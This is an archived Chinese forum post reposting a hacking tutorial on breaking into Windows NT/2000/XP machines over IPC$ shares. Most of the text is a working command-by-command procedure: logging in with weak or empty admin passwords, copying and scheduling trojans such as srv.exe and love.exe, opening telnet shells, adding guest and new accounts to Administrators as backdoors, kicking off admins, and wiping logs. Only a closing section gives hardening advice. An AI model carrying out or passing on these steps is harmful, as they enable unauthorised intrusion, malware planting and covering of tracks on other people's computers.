免费注册 查看新帖 |

Chinaunix

广告
  平台 论坛 博客 文库
最近访问板块 发新帖
查看: 1164 | 回复: 0
打印 上一主题 下一主题

DOS入侵示例 [复制链接]

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2007-12-26 22:27 |只看该作者 |倒序浏览

这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈)
  11. C:\>net use
[color="#0000ff"]\\127.0.0.1\IPC$
"密码" /user:"用户名"
  一般用流光,通过扫描弱口令来得到,管理员帐号和密码.
  2. C:\>copy srv.exe
[color="#0000ff"]\\127.0.0.1\admin$

  先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
    
  3. C:\>net time
[color="#0000ff"]\\127.0.0.1

  查查时间,发现127.0.0.1 的当前时间是 2004/6/15 上午 11:00,命令成功完成。
    
  4. C:\>at
[color="#0000ff"]\\127.0.0.1
11:05 srv.exe
  用at命令启动srv.exe吧
  5. C:\>net time
[color="#0000ff"]\\127.0.0.1

  再查查到时间没有?如果127.0.0.1 的当前时间是 2004/6/15 上午 11:05,那就准备开始下面的命令。
    
  6. C:\>telnet 127.0.0.1 99
  这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
  虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
    
  7.C:\>copy ntlm.exe
[color="#0000ff"]\\127.0.0.1\admin$

  用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
    
  8. C:\WINNT\system32>ntlm
  输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!
  9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)
  为了以防万一,我们再把guest激活加到管理组
  10. C:\>net user guest /active:yes
  将对方的Guest用户激活
  11. C:\>net user guest 1234
  将Guest的密码改为1234,或者你要设定的密码
  12. C:\>net localgroup administrators guest /add
  将Guest变为Administrator(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算
  13.使用nb2的sql工具。远程执行dos命令
  net start telnet 开telnet服务
  net user mint mint /add 添加用户mint密码为mint
  net localgroup administrators mint /add 将帐号mint升级为管理员
  7,使用3389登陆。发现登陆用户已满。不用怕。我们把他踢出去。
  8,telnet对方ip。发现需要NTLM 身份验证。怎么办?放弃不是黑客的追求。
  9,我们在自己的电脑里建立一个帐号mint密码为mint身份为管理员。
  10,找到c:\winnt\system32\cmd.exe 建立一个快捷方式到桌面。
  11,修改cmd的快捷方式属性为允许其他身份登陆。
  12,然后运行桌面上的cmd.exe的快捷方式。输入帐号mint密码mint
  13,telnet对方ip.直接可以登陆对方电脑了。
  使用命令
  c:\query user 查看对方目前终端登陆状况。
  运行命令
  c:\logoff 1 踢出去一个管理者
  再用c:\query user检查一便~~
  ok了
  14,使用3389远程终端登陆。
  入侵中可能会用到的相关命令
  请注意命令适用于本地还是远程,如果适用于本地,你只能在获得远程主机的shell后,才能向远程主机执行。
  1 建立空连接:
  net use
[color="#0000ff"]\\IP\ipc$
"" /user:""
  2 建立非空连接:
  net use
[color="#0000ff"]\\IP\ipc$
"psw" /user:"account"
  3 查看远程主机的共享资源(但看不到默认共享)
  net view
[color="#0000ff"]\\IP

  4 查看本地主机的共享资源(可以看到本地的默认共享)
  net share
  5 得到远程主机的用户名列表
  nbtstat -A IP
  6 得到本地主机的用户列表
  net user
  7 查看远程主机的当前时间
  net time
[color="#0000ff"]\\IP

  8 显示本地主机当前服务
  net start
  9 启动/关闭本地服务
  net start 服务名 /y
  net stop 服务名 /y
  10 映射远程共享:
  net use z:
[color="#0000ff"]\\IP\baby

  此命令将共享名为baby的共享资源映射到z盘
  11 删除共享映射
  net use c: /del 删除映射的c盘,其他盘类推
  net use * /del /y删除全部
  12 向远程主机复制文件
  copy \路径\srv.exe
[color="#0000ff"]\\IP\
共享目录名,如:
  copy ccbirds.exe
[color="#0000ff"]\\*.*.*.*\c
即将当前目录下的文件复制到对方c盘内
  13 远程添加计划任务
  at
[color="#0000ff"]\\ip
时间 程序名,如:
  at
[color="#0000ff"]\\127.0.0.0
11:00 love.exe
  注意:时间尽量使用24小时制;在系统默认搜索路径(比如system32/)下不用加路径,否则必须加全路径
  14 开启远程主机的telnet
  这里要用到一个小程序:opentelnet.exe,各大下载站点都有,而且还需要满足四个要求:
  1)目标开启了ipc$共享
  2)你要拥有管理员密码和帐号
  3)目标开启RemoteRegistry服务,用户就该ntlm认证
  4)对WIN2K/XP有效,NT未经测试
  命令格式:OpenTelnet.exe
[color="#0000ff"]\\server
account psw NTLM认证方式 port
  试例如下:c:\>OpenTelnet.exe \\*.*.*.* administrator "" 1 90
  15 激活用户/加入管理员组
  1 net uesr account /active:yes
  2 net localgroup administrators account /add
  16 关闭远程主机的telnet
  同样需要一个小程序:ResumeTelnet.exe
  命令格式:ResumeTelnet.exe
[color="#0000ff"]\\server
account psw
  试例如下:c:\>ResumeTelnet.exe \\*.*.*.* administrator ""
  17 删除一个已建立的ipc$连接
  net use
[color="#0000ff"]\\IP\ipc$
/del
  (本教程不定期更新,欲获得最新版本,请登陆官方网站:菜菜鸟社区原创
[color="#0000ff"]http://ccbirds.yeah.net

  十二 ipc$完整入侵步骤祥解
  其实入侵步骤随个人爱好有所不同,我就说一下常见的吧,呵呵,献丑了!
  1 用扫描软件搜寻存在若口令的主机,比如流光,SSS,X-scan等,随你的便,然后锁定目标,如果扫到了管理员权限的口令,你可以进行下面的步骤了,假设你现在得到了administrator的密码为空
  2 此时您有两条路可以选择:要么给对方开telnet(命令行),要么给它传木马(图形界面),那我们就先走telnet这条路吧
  3上面开telnet的命令没忘吧,要用到opentelnet这个小程序
  c:\>OpenTelnet.exe
[color="#0000ff"]\\192.168.21
.* administrator "" 1 90
  如果返回如下信息
  *******************************************************
  Remote Telnet Configure, by refdom
  Email:
[color="#0000ff"]refdom@263.net

  OpenTelnet.exe
  UsagepenTelnet.exe
[color="#0000ff"]\\server
username password NTLMAuthor telnetport
  *******************************************************
  Connecting
[color="#0000ff"]\\192.168.21.*...Successfully
!
  NOTICE!!!!!!
  The Telnet Service default setting:NTLMAuthor=2 TelnetPort=23
  Starting telnet service...
  telnet service is started successfully! telnet service is running!
  BINGLE!!!Yeah!!
  Telnet Port is 90. You can try:"telnet ip 90", to connect the server!
  Disconnecting server...Successfully!
  *说明你已经打开了一个端口90的telnet。
  4 现在我们telnet上去
  telnet 192.168.21.* 90
  如果成功,你将获得远程主机的一个shell,此时你可以像控制自己的机器一样控制你的肉鸡了,那么做点什么呢?把guest激活再加入管理组吧,就算留个后门了
  5 C:\>net user guest /active:yes
  *将Guest用户激活,也有可能人家的guest本来就试活的,你可以用net user guest看一下它的帐户启用的值是yes还是no
  6 C:\>net user guest 1234
  *将Guest的密码改为1234,或者改成你喜欢的密码
  7 C:\>net localgroup administrators guest /add
  *将Guest变为Administrator,这样,即使以后管理员更改了他的密码,我
们也可以用guest登录了,不过也要提醒您,因为通过安全策略的设置,可以禁止guest等帐户的远程访问,呵呵,如果真是这样,那我们的后门也就白做
了,愿上帝保佑Guest。
  8 好了,现在我们来走另一条路,给它传个木马玩玩
  9 首先,我们先建立起ipc$连接
  C:\>net use
[color="#0000ff"]\\192.168.21.*\ipc$
"" /user:administrator
  10 既然要上传东西,就要先知道它开了什么共享
  C:\>net view
[color="#0000ff"]\\192.168.21
.*
  在
[color="#0000ff"]\\192.168.21
.*的共享资源
  资源共享名 类型 用途 注释
  -----------------------------------------------------------
  C Disk
  D Disk
  命令成功完成。
  *好了,我们看到对方共享了C,D两个盘,我们下面就可以向任意一个盘复制文件了。再次声明,因为用net view命令无法看到默认共享,因此通过上面返回的结果,我们并不能判断对方是否开启了默认共享。
  11 C:\>copy love.exe
[color="#0000ff"]\\192.168.21.*\c

  已复制 1 个文件
  *用这个命令你可以将木马客户端love.exe传到对方的c盘下,当然,如果能复制到系统文件夹下是最好的了,不容易被发现
  12 运行木马前,我们先看看它现在的时间
  net time
[color="#0000ff"]\\192.168.21
.*
  
[color="#0000ff"]\\192.168.21
.*的当前时间是 2003/8/22 上午 11:00
  命令成功完成
  13 现在我们用at运行它吧,不过对方一定要开了Task Scheduler服务(允许程序在指定时间运行),否则就不行了
  C:\>at
[color="#0000ff"]\\192.168.21
.* 11:02 c:\love.exe
  新加了一项作业,其作业 ID = 1
  14 剩下就是等了,等过了11:02,你就可以用控制端去连接了,如果成功你将可以用图形界面去控制远程主机了,如果连接失败,那么它可能在局域网里,也可能程序被防火墙杀了,还可能它下线了(没这么巧吧),无论哪种情况你只好放弃了
  嗯,好了,两种基本方法都讲了。如果你对上面的操作已经轻车熟路了,也可以用更高效的套路,比如用CA克隆guest,用psexec执行木马,用命令:psexec
[color="#0000ff"]\\tergetIP
-u user -p paswd cmd.exe直接获得shell等,这些都是可以得,随你的便。不过最后不要忘了把日志清理干净,可以用榕哥的elsave.exe。
  讲了ipc$的入侵,就不能不说如何防范,那么具体要怎样做呢?看下面
  1,怎样建立空连接,它有什么用?
  答:使用命令 net use \IPipc$ "" /user:"" 就可以简单地和目标建立一个空连接(需要目标开放ipc$)。
  对于NT,在默认安全设置下,借助空连接可以列举目标用户、共享,访问everyone权限的共享,访问小部分注册表等,没有什么利用价值。对2000作用就更小了。而且实现也不方便,需借助工具。
  2.为什么我连不上IPC$?
  答:1.只有nt/2000/xp及以上系统才可以建立ipc$。如果你用的是98/me是没有该功能的。
  2.确认你的命令没有打错。正确的命令是: net use \目标IPipc$ "密码" /user:"用户名"
  注意别多了或少了空格。当用户名和密码中不包含空格时两边的双引号可以省略。空密码用""表示。
  3,根据返回的错误号分析原因:
  错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限;
  错误号51,Windows 无法找到网络路径 : 网络有问题;
  错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
  错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$;
  错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连。
  错误号1326,未知的用户名或错误密码 : 原因很明显了;
  错误号1792,试图登录,但是网络登录服务没有启动 : 目标NetLogon服务未启动。(连接域控会出现此情况)
  错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。
  4,关于ipc$连不上的问题比较复杂,没有总结出一个统一的认识,在肉鸡上实验有时会得出矛盾的结论,十分棘手。 而且知道了问题所在,如果没有用其他办法获得shell,很多问题依然不能解决。
  5,怎样打开目标的IPC$?
  答:首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、
telnet、木马。当然,这shell必须是admin权限的。然后你可以使用shell执行命令 net share ipc$
来开放目标的ipc$。从上一问题可以知道,ipc$能否使用还有很多条件。请确认相关服务都已运行,没有就启动它(不知道怎么做的请看net命令的用
法)。还是不行的话(比如有防火墙,杀不了)建议放弃。
  6,怎样映射和访问默认共享?
  答:使用命令 net use z: \目标IPc$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘,其他盘类推。
  如果已经和目标建立了ipc$,则可以直接用IP加盘符加$访问。比如 copy
muma.exe \IPd$pathmuma.exe 。或者再R射也可以,只是不用用户名和密码了:net use y: \IPd$ 。然后
copy muma.exe y:pathmuma.exe 。当路径中包含空格时,须用""将路径全引住。
  7,如何删除映射和ipc$连接?
  答:用命令 net use \IPipc$ /del 删除和一个目标的ipc$连接。
  用命令 net use z: /del 删除映射的z盘,其他盘类推。
  用命令 net use * /del 删除全部。会有提示要求按y确认。
  8,连上ipc$然后我能做什么?
  答:能使用管理员权限的帐号成功和目标连接ipc$,表示你可以和对方系统做深入“交流”
了。你可以使用各种命令行方式的工具(比如pstools系列、Win2000SrvReskit、telnethack等)获得目标信息、管理目标的进
程和服务等。如果目标开放了默认共享(没开你就帮他开),你就可以上传木马并运行。也可以用tftp、ftp的办法上传。像dwrcc、VNC、
RemoteAdmin等工具(木马)还具有直接控屏的功能。如果是2000server,还可以考虑开启终端服务方便控制。这里提到的工具的使用,请看
自带的说明或相关教程。
  9,怎样防止别人用ips$和默认共享入侵我?
  答:A、一种办法是把ipc$和默认共享都删除了。但重起后还会有。这就需要改注册表。
  1,先把已有的删除
  net share ipc$ /del
  net share admin$ /del
  net share c$ /del
  …………(有几个删几个)
  2,禁止别人空连接
        首先运行regedit,找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA]把RestrictAnonymous(DWORD)的键值改为:00000002。
       3,禁止自动打开默认共享
       
对于server版,找到如下主键
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]
把AutoShareServer(DWORD)的键值改为:00000000。
  对于pro版,则是[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareWks(DWORD)的键值改为:00000000。
  如果上面所说的主键不存在,就新建一个再改键值。
  B、另一种是关闭ipc$和默认共享依赖的服务(不推荐)
  net stop lanmanserver
  可能会有提示说,XXX服务也会关闭是否继续。因为还有些次要的服务依赖于lanmanserver。一般情况按y继续就可以了。
  C、最简单的办法是设置复杂密码,防止通过ipc$穷举密码。但如果你有其他漏洞,ipc$将为进一步入侵提供方便。
  D、还有一个办法就是装防火墙,或者端口过滤。
  结束进程:ntsd -c q -p PID
引:http://blog.chinaunix.net/u/28888/showart_234493.html
               
               
               

本文来自ChinaUnix博客,如果查看原文请点:http://blog.chinaunix.net/u1/50331/showart_450936.html
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP